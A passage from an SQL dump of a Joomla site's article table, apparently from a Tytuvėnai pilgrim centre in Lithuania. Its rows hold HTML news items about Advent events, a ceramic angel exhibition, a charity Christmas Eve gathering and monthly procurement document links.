00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/poezija\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,119,'','',1,3151,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(249,337,'\"Užkoduotas Tėvynės meilės ir ilgesio genas\"','monospektaklis-uzkoduotas-tevynes-meiles-ir-ilgesio-genas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Visus kviečiame į nemokamą renginį \"Užkoduotas Tėvynės meilės ir ilgesio genas\". Lauksime Jūsų Tytuvėnų vienuolyno refektorinėje salėje, š.m. gruodžio 8 d. 18 val.. Renginį Jums dovanoja Kelmės Rotary klubas.</span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/oginski/Oginski.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2015-12-03 11:23:38',135,'','2015-12-03 11:29:45',135,0,'0000-00-00 00:00:00','2015-12-03 11:23:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/oginski\\/oginskis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/stories\\/naujienos\\/oginski\\/oginskis.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,127,'','',1,3053,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(250,338,'Renginiai nuo advento iki trijų karalių','renginiai-nuo-advento-iki-triju-karaliu','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>Irenos Šliuželienės keramikos darbų paroda</strong><br /><strong>Monospektaklis “Užkoduotas Tėvynės meilės ir ilgesio genas”</strong><br /><strong>Edukacinės programos</strong> <br /><strong>Advento pamoka \"Angelėlis Kalėdų eglutei\"</strong><br /><strong>Adventinis labdaros susiejimas \"Prie balto Kūčių stalo\"</strong><br /></span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">NUO ADVENTO IKI TRIJŲ KARALIŲ </span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>RENGINIAI</strong> </span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">TYTUVĖNŲ BERNARDINŲ VIENUOLYNE PARODOS:</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><br /> Irenos Šliuželienės keramikos darbų paroda<br /> Reginos Teresiūtės (SJ) kolekcija<br /> 2015-12-07 – 2016-01-10<br /><br /> MONOSPEKTAKLIS<br /> “Užkoduotas Tėvynės meilės ir ilgesio genas”<br /> 2015-12-08 18 val.<br /><br /> EDUKACINĖS PROGRAMOS:<br /> Piligrimų gira su švenčių prieskoniais<br /> Šiaudų pasakos<br /> Užsisakyti reikia iš anksto.<br /><br /> ADVENTO PAMOKA<br /> Angelėlis Kalėdų eglutei<br /> 2015-12-17 14 val.<br /><br /> ADVENTINIS LABDAROS SUSIĖJIMAS<br /> „ Prie balto Kūčių stalo“<br /> 2015-12 -23 10 val.<br /><br /> Organizatoriai :<br /> VšĮ „Tytuvėnų piligrimų centras“<br /> Kelmės Rotary klubas<br /> Tytuvėnų seniūnija<br /> Tytuvėnų parapija<br /> Gyvojo Rožinio draugija<br /><br /> Dėl išsamesnės informacijos kreiptis tel.8 427 562 23, e.p. <a href=\"mailto:info@infotytuvenai.lt%20%20\">info@infotytuvenai.lt  </a></span></p>',1,0,0,44,'2015-12-03 11:37:25',135,'','2015-12-03 11:43:33',135,0,'0000-00-00 00:00:00','2015-12-03 11:37:25','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/renginiai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/stories\\/naujienos\\/renginiai.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,126,'','',1,3856,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(251,339,'Paroda \"RAMYBĖS ŠYPSENA\"','paroda-ramybes-sypsena','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Visą švenčių laikotarpį Tytuvėnų bernardinų vienuolyno bibliotekos salėje galima pamatyti keramikės Irenos Šliuželienės darbus. Kūčių dieną, ruošiantis Bernelių Šv. Mišioms keramikės statulėles įsikūrė ir Tytuvėnų bažnyčios prakartėlėje.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/paroda_ramybes_sypsena/pic{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">„Kurti angelus mane įkvėpė vaikystė. Vaiko judesys, vaiko nuotaika, poza, žaismė — tai savaime traukia akį, nes vaikai visi gražūs, be išimties“, — tokius parodos autorės žodžius užrašė „ Šiaulių krašto“ žurnalistė. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dar studijuodama Šiaulių pedagoginiame institute, dailės fakultete, parodos autorė pradėjo kurti angelus. Menininkė sakė kad šis „žaidimas“ įtraukė ir nebepaleidžia jau daugelį metų.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> Daugybė menininkės darbų pasklidę įvairiose pasaulio šalyse. Žmonės įsigyja angelo statulėlę namams papuošti, ar kaip dovaną šeimos švenčių, jubiliejų proga. <br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dažnas iš angelėlių išleistų į pasaulį turi ir savo istoriją. Autorė prisimena  angelą, kurį, vaikų prašymu, nulipdė šimtametei močiutei. Senutė buvusi beveik akla , todėl angelą dailininkė stengėsi kurti išraiškingą, kad liesdama močiutė galėtų jį „matyti“. Vėliau angelo kūrėjai, senolės vaikai pasakojo, jog  kiekvieną dieną, iki pat mirties, mama eidavo angelo paglostyti.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>Irena Šliuželienė</strong> - dailininkė keramikė, pedagogė, skulptūros, keramikos, piešimo, kompozicijos mokytoja, neformaliojo vaikų švietimo mokytoja metodininkė. Nuo 1987 m. dalyvauja Šiaulių miesto ir respublikinėse parodose.  2004 metais paskirta Angelo Frosto premija už kūrybą, skirtą Kalėdų šventėms. Jos keramikos darbų yra įsigiję privatūs Italijos, Vokietijos, Anglijos, Švedijos, JAV kolekcininkai. <br /><br /><br style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\" /></span></p>',1,0,0,44,'2015-12-31 07:37:00',135,'','2015-12-31 07:37:09',135,0,'0000-00-00 00:00:00','2015-12-31 07:37:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/paroda_ramybes_sypsena\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,125,'','',1,3189,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(253,341,'Adventinis labdaros susitikimas','adventinis-labdaros-susitikimas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jau tapo tradicija prieš šv. Kūčias sukviesti Tytuvėnų miestelio vienišus ir nepasiturinčius žmones prie bendro stalo kartu pabūti, pasivaišinti, pasidžiaugti.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/kuciu_vakariene/pic{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šios tradicijos pradininkės - Gyvojo Rožinio draugijos moterys prieš dešimt metų pirmą kartą pakvietusios susirinkti kartu švęsti Kristaus gimimo šventės. Šių metų (2015m.) labdaros adventinį susiėjimą kartu su Gyvojo Rožinio draugijos narėmis padėjo surengti Tytuvėnų parapijos klebonas, Tytuvėnų piligrimų centro darbuotojai, Tytuvėnų miestelio bendruomenė,o Tytuvėnų miesto seniūnija visiems dovanojo muzikinę dovaną. Gražių švenčių, sėkmingų ateinančių metų susirinkusiems miestelėnams palinkėjo Irena Sirusienė, Evaldas Alūza, Rimantas Žaromskis, Romas Čerkauskas.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tegul ateinantys metai būna pilni tikėjimo, meilės ir vilties.<br /><br /><br /><br /><br /><br style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\" /></span></p>',1,0,0,44,'2015-12-31 07:55:29',135,'','2015-12-31 07:58:11',135,0,'0000-00-00 00:00:00','2015-12-31 07:55:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kuciu_vakariene\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,123,'','',1,3205,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(254,342,'Mažos vertės pirkimai 2014 m.','vieieji-pirkimai-2','','<table style=\"padding: 0em;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_sausis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_sausis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Sausis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_vasaris.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_vasaris.pdf\" target=\"_blank\">Mažos vertės pirkimai. Vasaris.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_kovas.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_kovas.pdf\" target=\"_blank\">Mažos vertės pirkimai. Kovas.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_balandis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_balandis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Balandis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_geguze.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_geguze.pdf\" target=\"_blank\">Mažos vertės pirkimai. Gegužė.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/birzelis_mazos_vertes.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/birzelis_mazos_vertes.pdf\" target=\"_blank\">Mažos vertės pirkimai. Birželis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/liepa_mazos_vertes.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/liepa_mazos_vertes.pdf\" target=\"_blank\">Mažos vertės pirkimai. Liepa.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/rugpjutis_mazos_vertes.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/rugpjutis_mazos_vertes.pdf\" target=\"_blank\">Mažos vertės pirkimai. Rugpjūtis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_pirkimai_rugsejis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_pirkimai_rugsejis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Rugsėjis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_pirkimai_spalis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_pirkimai_spalis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Spalis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_pirkimai_lapkritis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_pirkimai_lapkritis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Lapkritis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_gruodis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/mazos_vertes_gruodis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Gruodis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',-2,0,0,43,'2013-02-20 06:06:04',135,'','2016-01-06 19:13:38',135,0,'0000-00-00 00:00:00','2013-02-20 06:06:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,1,'','',1,492,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(266,354,'50-mečio jubiliejus','50-mecio-jubiliejus','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Balandžio 9 d. iškilmingai paminėtas Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios klebono Rimanto Žaromskio 50-mečio jubiliejus.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: 